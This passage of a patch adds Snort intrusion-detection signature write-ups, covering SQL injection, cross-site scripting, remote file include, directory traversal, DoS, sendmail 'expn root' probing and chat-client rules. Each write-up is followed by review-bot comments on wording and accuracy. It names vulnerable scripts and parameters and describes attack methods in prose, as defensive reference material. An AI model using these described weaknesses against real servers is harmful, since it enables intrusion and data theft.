+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "id" parameter in the "diver.php" script used by the "Vincent-Leclercq News" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Vincent-Leclercq News
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
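Review bot: "running ona web server" should be "on a web server", and "may indicate that an exploitation attempt has been attempted" is redundant ("may indicate an exploitation attempt"). The third Detailed Information paragraph (credential validation, trust relationships) is boilerplate that does not describe an SQL injection through the "id" parameter of diver.php and should be dropped. The application name is hyphenated ("Vincent-Leclercq News") here but not in 100000700.txt. The Corrective Action could add the mitigation the Attack Scenarios paragraph already implies: parameterised queries and validation of "id" before it reaches the database.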
--- /dev/null
+++ b/doc/signatures/1834.txt
@@ -0,0 +1,81 @@
+Rule:
+
+--
+Sid:
+1834
+
+--
+Summary:
+This event is generated when a cross-site scripting attack is being 
+attempted, or a potential attacker is testing your site to determine if 
+it is vulnerable.
+
+--
+Impact:
+Successful cross-site scripting attacks generally target the users of 
+your web site. Attackers can potentially gain access to your users' 
+cookies or session ids, allowing the attacker to impersonate your
+user. They could also set up elaborate fake logon screens to steal 
+user names and passwords.
+
+--
+Detailed Information:
+Whenever a web application accepts input (either via the URL or the 
+POST method) and then uses that input as part of the HTML of a new page 
+without filtering, the application is vulnerable to cross-site 
+scripting.  The traditional means of exploiting this is to embed a 
+"<SCRIPT>" tag into the input. The code following the tag is then 
+executed by the victim's browser.
+
+--
+Affected Systems:
+Many older versions of web server software are affected, as are numerous
+web applications.
+
+--
+Attack Scenarios:
+The most common avenue of attack is for the attacker to send an HTML 
+formatted email to the victim. The email will contain a link to a 
+specially crafted URL which contains the exploit. When the victim clicks
+on the link, they are directed to the vulnerable web site and the attack
+code is executed by their browser.
+
+--
+Ease of Attack:
+Moderately Easy.  Exploit code exists to automate attacks against users 
+of some widely deployed web applications which are known to be 
+vulnerable. 
+
+Finding vulnerabilities in other, including proprietary, web
+applications is fairly trivial and existing exploit code could easily be
+modified to take advantage of newly discovered vulnerabilities.
+
+--
+False Positives:
+Web pages that legimately include the <SCRIPT> tag could generate this 
+event under certain circumstances.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Determine if your web application is actually vulnerable to this 
+attack. If it is and the application is not of your own design, contact 
+the authors or vendor and see if there is a patch or newer version.
+
+If the application is proprietary to you or your company, ensure that it 
+properly validates input.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Kevin Peuhkurinen
+
+-- 
+Additional References:
+
+--
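Review bot: "legimately" in False Positives should be "legitimately", and "Finding vulnerabilities in other, including proprietary, web applications" reads awkwardly ("in other web applications, including proprietary ones"). The Corrective Action tells in-house developers to ensure the application "properly validates input"; for cross-site scripting the key control is encoding user-supplied data when it is written into HTML, so suggest adding output encoding alongside input validation. Trailing whitespace on most wrapped lines and on the "-- " before Additional References.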
--- /dev/null
+++ b/doc/signatures/306.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid: 306
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a vulnerability in VQ Server to cause a Denial of Service (DoS).
+
+--
+Impact:
+Serious. A Denial of Service on the target server is possible.
+
+--
+Detailed Information:
+vqServer is a personal web server that runs on Microsoft Windows, Linux and Solaris. Version 1.4.49 suffers from a DoS condition if a long GET request is issued to the server.
+
+Affected Systems:
+	vqServer 1.4.49
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/1610
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0766
+
+vqSoft:
+http://www.vqsoft.com/
+
+
+--
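Review bot: the "--" separator between Detailed Information and Affected Systems is missing (the "vqServer is a personal web server" paragraph runs straight into "Affected Systems:"). The product is spelled "VQ Server" in the Summary and "vqServer" in Detailed Information and Affected Systems. "Attack Scenarios: Exploit scripts are available" repeats Ease of Attack instead of describing the scenario already given in Detailed Information (a long GET request issued to the server); suggest moving that description here. Also "Sid: 306" on one line differs from the two-line Sid layout used by most files, "None Known" differs from "None known" elsewhere, and there are two blank lines before the closing "--".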
--- /dev/null
+++ b/doc/signatures/1633.txt
@@ -0,0 +1,51 @@
+Rule:
+
+--
+Sid: 1633
+
+--
+Summary:
+This event is generated when activity relating to network chat clients is detected.
+
+--
+Impact:
+Policy Violation. Use of chat clients to communicate with unkown external sources may be against the policy of many organizations.
+
+--
+Detailed Information:
+Instant Messaging (IM) and other chat related client software can allow users to transfer files directly between hosts. This can allow malicious users to circumvent the protection offered by a network firewall.
+
+Vulnerabilities in these clients may also allow remote attackers to gain unauthorized access to a host.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party using the file transfer capabilities of an IM client.
+
+An attacker might utilize a vulnerability in an IM client to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
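Review bot: "unkown" in Impact should be "unknown". The file has no Affected Systems section, the Additional References section is empty, and the Summary only says "network chat clients", so a reader cannot tell which client or protocol sid 1633 covers; suggest naming it. The same text reappears in 1989.txt, which at least carries MSN Messenger references, so without a product name here the two entries are indistinguishable.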
--- /dev/null
+++ b/doc/signatures/660.txt
@@ -0,0 +1,55 @@
+
+--
+Sid:
+660
+
+--
+Summary:
+This event is generated when an attempt is made to expand the alias of root on a Sendmail server.
+
+--
+Impact:
+Reconnaissance.  This is an attempt to discover email addresses associated with the alias of root for a Sendmail server.
+
+--
+Detailed Information:
+An attacker may probe for email addresses associated with the alias of root on a Sendmail server.  The "expn" command expands the alias into a list of actual recipients associated with the alias.  This command can be used to determine who reads the mail sent to the administrator.  It may be used by spammers to get valid email accounts or may be used to discover valid accounts on the Sendmail server.
+
+--
+Affected Systems:
+Versions of Sendmail that do not disable expn.
+
+--
+Attack Scenarios:
+An attacker can telnet to the Sendmail server and issue the command "expn root" to gather email addresses associated with the alias of root.
+
+--
+Ease of Attack:
+Easy.  Telnet to the Sendmail server and issue the command "expn root". 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Edit the /etc/sendmail.cf file to disable expn by setting PrivacyOptions=noexpn. 
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS31
+
+
+--
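Review bot: the file is missing the "Rule:" header line that every other entry starts with; it begins with a blank line and "--". The Corrective Action "Edit the /etc/sendmail.cf file to disable expn by setting PrivacyOptions=noexpn" should show the option in sendmail.cf syntax ("O PrivacyOptions=noexpn") and note that a hand edit to sendmail.cf is lost when the file is regenerated from sendmail.mc, where the equivalent setting is confPRIVACY_FLAGS. Ease of Attack repeats the Attack Scenarios sentence almost verbatim, there are two blank lines before the closing "--", and there is trailing whitespace after "expn root"." and "noexpn.".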
--- /dev/null
+++ b/doc/signatures/316.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid: 316
+
+--
+Summary:
+This event is generated when an attempt is made to escalate privileges remotely using a vulnerability in mountd.
+
+--
+Impact:
+System compromize presenting the attacker with escalated system privileges .
+
+--
+Detailed Information:
+Some implementations of the Network File System (NFS) on Linux systems use a vulnerable version of mountd that is subject to a buffer overflow condition in the logging subsystem.
+
+The mountd logging facility also logs failed attempts to mount shared resources, even if NFS is not enabled on the system. This means that exploitation of this issue is possible wether or not NFS is being used.
+
+Affected Systems:
+	Caldera OpenLinux Standard 1.2
+	RedHat Linux 2.0, 2.1, 3.0.3, 4.0, 4.1, 4.2, 5.0, 5.1
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/121
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0917
+
+CERT:
+http://www.cert.org/advisories/CA-1998-12.html
+http://www.cert.org/summaries/CS-98-08.html
+
+--
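Review bot: typos: "compromize" should be "compromise", "wether" should be "whether", and "privileges ." has a space before the full stop. The "--" separator between Detailed Information and Affected Systems is missing (the "mountd logging facility" paragraph runs straight into "Affected Systems:"). "Attack Scenarios: Exploit scripts are available" duplicates Ease of Attack rather than describing a scenario; Detailed Information already gives one (a failed mount request that triggers the overflow in the logging subsystem), so suggest moving it here. Since the text notes that failed mount attempts are logged even where NFS is not enabled, the Corrective Action could add that mountd should be removed or filtered on hosts that do not serve NFS, not merely left unused.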
--- /dev/null
+++ b/doc/signatures/1229.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid: 
+1229
+
+--
+Summary:
+This event is generated when activity relating to spurious ftp traffic 
+is detected on the network.
+
+--
+Impact:
+Varies from information gathering to a serious compromise of an ftp 
+server.
+
+--
+Detailed Information:
+FTP is used to transfer files between hosts. This event is indicative of
+spurious activity in FTP traffic between hosts.
+
+The event may be the result of a transfer of a known protected file or 
+it could be an attempt to compromise the FTP server by overflowing a 
+buffer in the FTP daemon or service.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party 
+using FTP.
+
+An attacker might utilize a vulnerability in an FTP daemon to gain 
+access to a host, then upload a Trojan Horse program to gain control of 
+that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow access to FTP resources from hosts external to the protected 
+network.
+
+Use secure shell (ssh) to transfer files as a replacement for FTP.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
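Review bot: the Summary ("spurious ftp traffic") and Detailed Information ("indicative of spurious activity") never say what sid 1229 actually matches, and the file has no Affected Systems section; suggest stating the command or pattern the rule looks for and which FTP servers are relevant. The Corrective Action "Use secure shell (ssh) to transfer files" would be clearer as scp or sftp. Trailing whitespace after "Sid: " and on most wrapped lines.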
--- /dev/null
+++ b/doc/signatures/1502.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1502
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
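Review bot: "running ona web server" should be "on a web server". The Detailed Information line "relationships between the victim server and other hosts can be exploited by the attacker." is not wrapped at the column used by the rest of the file, and "attackers choosing" (Impact and Detailed Information) needs an apostrophe. As with 1576.txt, the text is generic and does not say what sid 1502 matches, and Additional References is empty. Trailing whitespace after "known " in the Summary.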
--- /dev/null
+++ b/doc/signatures/2153.txt
@@ -0,0 +1,58 @@
+Rule:
+--
+Sid:
+2153
+
+--
+Summary:
+This event is generated when a remote user attempts to access autohtml.php on a web server. This may indicate an attempt to exploit a directory traversal vulnerability in PHP-Proxima, a web site portal application.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event may indicate an attempt to exploit a vulnerability in the autohtml.php script within PHP-Proxima. An attacker can use directory traversal techniques when accessing autohtml.php to view hidden files and directories on the web server with the access privileges of the server. 
+
+--
+Affected Systems:
+Any server running PHP-Proxima.
+
+--
+Attack Scenarios:
+An attacker can use directory traversal techniques when executing autohtml.php to view directories and files on the web server.
+
+--
+Ease of Attack:
+Simple. A proof of concept exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Comment out or remove the "include("autohtml/$name");" line from the autohtml.php script.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/7598
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=11630
+
+--
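Review bot: the Corrective Action ("Comment out or remove the "include("autohtml/$name");" line") removes the feature rather than fixing the flaw; the traversal described in Detailed Information comes from "$name" being used unchecked in the include path, so suggest recommending validation of "$name" against the expected file names (or the vendor's patch) as the primary fix, with removal of the include as the fallback. Formatting: no blank line between "Rule:" and "--", and the reference labels "Bugtraq" and "Nessus" lack the colon used in the other files.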
--- /dev/null
+++ b/doc/signatures/100000323.txt
@@ -0,0 +1,78 @@
+
+
+Rule:
+
+--
+Sid:
+100000323
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "ScozNet ScozNews" application running on a 
+webserver. Access to the file "news.php" using a remote file being passed as 
+the "main_path" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "main_path" parameter in the "news.php" script used by 
+the "ScozNet ScozNews" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using ScozNet ScozNews
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
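Review bot: "running ona web server" should be "on a web server", and "may indicate that an exploitation attempt has been attempted" is redundant. The third Detailed Information paragraph and the Attack Scenarios paragraph (credential validation, "supply his/her own credentials") are generic CGI boilerplate that do not describe a remote file include; the scenario for this rule is the one the Summary already states, a remote file supplied in the "main_path" parameter of news.php, and Attack Scenarios should say so. Trailing whitespace on almost every wrapped line, and Additional References is empty.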
--- /dev/null
+++ b/doc/signatures/100000801.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000801
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "Pivot" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "js_name" parameter in the "editor_menu.php" script used by the "Pivot" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Pivot
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
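Review bot: this entry is identical to 100000800.txt except that the parameter is "js_name" instead of "name" in the same editor_menu.php script; the Summary should name the parameter so the two sids can be told apart without reading Detailed Information. Same layout points as 100000800.txt (two leading blank lines, no blank line after the Sid value or after the Affected Systems and Contributors blocks), and the Impact paragraph again describes server compromise for what Attack Scenarios describes as a link that steals information from the user who clicks it.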
--- /dev/null
+++ b/doc/signatures/268.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+268
+
+--
+Summary:
+This event is generated when a remote attacker attempts to send large, fragmented IP packets to the internal network, indicating a Jolt Denial of Service (DoS) attack.
+
+--
+Impact:
+Denial of service.
+
+--
+Detailed Information:
+Jolt is a DoS attack characterized by large, fragmented IP packets that, when launched at a Windows system, can hang or crash the computer. 
+
+--
+Affected Systems:
+Windows 95
+Windows 98
+Windows NT
+Windows 2000
+
+--
+Attack Scenarios:
+An attacker sends oversized, fragmented IP packets to a target computer. If the computer is running an unpatched version of Windows, it may crash.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Install the latest patches available for your operating system.
+
+Implement a packet-filtering firewall to block inappropriate traffic to the network.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+
+--
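Review bot: the Additional References section is empty although the Summary names the Jolt attack and the Corrective Action says "Install the latest patches available for your operating system"; cite the vendor patch or advisory so the advice can be verified. The Detailed Information also never states what the rule actually matches (fragment size, offset or flags), which is what an analyst tuning it needs, and "Implement a packet-filtering firewall to block inappropriate traffic" should say concretely which traffic, for example the oversized fragments the rule keys on.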
--- /dev/null
+++ b/doc/signatures/1989.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid: 1989
+
+--
+Summary:
+This event is generated when activity relating to network chat clients is detected.
+
+--
+Impact:
+Policy Violation. Use of chat clients to communicate with unkown external sources may be against the policy of many organizations.
+
+--
+Detailed Information:
+Instant Messaging (IM) and other chat related client software can allow users to transfer files directly between hosts. This can allow malicious users to circumvent the protection offered by a network firewall.
+
+Vulnerabilities in these clients may also allow remote attackers to gain unauthorized access to a host.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party using the file transfer capabilities of an IM client.
+
+An attacker might utilize a vulnerability in an IM client to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+MSN Protocol
+http://www.hypothetic.org/docs/msn/
+Devarticles
+http://www.devarticles.com/index2.php?option=content&task=view&id=225&pop=1&hide_ads=1&page=1
+MSN Messenger Protocol
+http://www.venkydude.com/articles/msn.htm
+
+--
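Review bot: this file has no "Affected Systems:" section, which every other signature document in the patch carries between Detailed Information and Attack Scenarios; add one (for a policy rule, something like "All hosts running IM or chat client software"). Also "Sid: 1989" puts the number on the heading line while the other files put it on its own line, "unkown external sources" should be "unknown", and the two "None Known" entries lack the trailing period used elsewhere.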
--- /dev/null
+++ b/doc/signatures/866.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+866
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
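Review bot: the Detailed Information and Attack Scenarios are generic CGI boilerplate and never say which script or URI Sid 866 matches, so an analyst cannot distinguish a true positive from a false one; name the CGI program the rule looks for and cite its advisory in the empty Additional References section. Minor: "running ona web server" should be "on a web server" and "attackers choosing" should be "attacker's choosing".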
--- /dev/null
+++ b/doc/signatures/1539.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1539
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
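Review bot: apart from the Sid this file is identical to 866.txt earlier in the patch, including the "running ona web server" typo, so it documents nothing specific to rule 1539. Each file should at least name the CGI script the rule matches and fill the empty Additional References section; the shared boilerplate hides the one sentence an analyst actually needs.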
--- /dev/null
+++ b/doc/signatures/2549.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2549
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a vulnerability
+associated with the web interface support for the HP JetAdmin printer.
+
+--
+Impact:
+A successful attack may allow a sensitive system file to be overwritten.
+
+--
+Detailed Information:
+The HP Web JetAdmin provides a web interface for the administration of the HP
+Web JetAdmin printer.  A vulnerability is present that allows an existing file
+on the server to be overwritten. This problem exists because the script 
+/plugins/framework/script/tree.xms does not sanitize the value supplied to
+the parameter WriteToFile, permitting a directory traversal from the web root
+directory to any file. An attacker can supply the data to write to the specified
+file.
+
+--
+Affected Systems:
+HP Web JetAdmin 7.2.
+
+--
+Attack Scenarios:
+An attacker can overwrite a sensitive system file using the WriteToFile parameter
+and supplying the data to write to the file. 
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+The default HP Web JetAdmin port is 8000.  If an administrator selects a different port
+on which to run the web interface, no alert will be detected.  In that case, the rule
+should be altered to reflect the port on which the web interface runs.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software or apply the appropriate patch
+when it becomes available.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+Bugtraq:
+http://www.securityfocus.com/bid/9973
+
+--
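Review bot: the Detailed Information is circular: "The HP Web JetAdmin provides a web interface for the administration of the HP Web JetAdmin printer" describes the software as administering itself, and the Summary calls JetAdmin a printer. HP Web JetAdmin is printer management software, so "for the administration of HP printers" is the accurate wording. Also "Additional References" is missing its trailing colon, and "no alert will be detected" in False Negatives should be "no alert will be generated".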
--- /dev/null
+++ b/doc/signatures/115-5.txt
@@ -0,0 +1,71 @@
+
+
+Rule:
+
+--
+Sid:
+115-5
+
+--
+Summary:
+This event is generated when the pre-processor asn1 detects network
+traffic that may constitute an attack. Specifically an asn.1 datum
+length greater than the packet length was detected.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when the asn1 pre-processor detects network
+traffic that may consititute an attack.
+
+This indicates that the data length is greater than the packet length
+and may indicate an attempt to cause a buffer overflow or it may be an
+attempt to evade detection by an IDS that may not correctly process
+asn1 data.
+
+More information on this event can be found in the individual
+pre-processor documentation README.asn1 in the docs directory of the
+snort source. Detailed instructions and examples on how to tune and use
+the pre-processor can also be found in the same document.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+ASN1 Information Site:
+http://asn1.elibel.tm.fr/
+
+--
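Review bot: the Attack Scenarios section is empty; Detailed Information already names the two motives for an ASN.1 length exceeding the packet length (a buffer overflow attempt and evasion of an IDS that mis-parses asn1 data), and those two cases belong here. "consititute" should be "constitute", and "Impact: Unknown." sits oddly next to "Ease of Attack: Simple."; if the impact depends on how the receiving decoder handles the length, say so rather than leaving it blank.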
--- /dev/null
+++ b/doc/signatures/677.txt
@@ -0,0 +1,76 @@
+Rule:  
+
+--
+Sid:
+677
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an SQL database
+server that may result in a serious compromise of the data stored on
+that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained administrator access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an
+SQL database that may result in a serious compromise of all data stored
+on that system.
+
+Such commands may be used to gain access to a system with the privileges
+of an administrator, delete data, add data, add users, delete users,
+return sensitive information or gain intelligence on the server software
+for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the
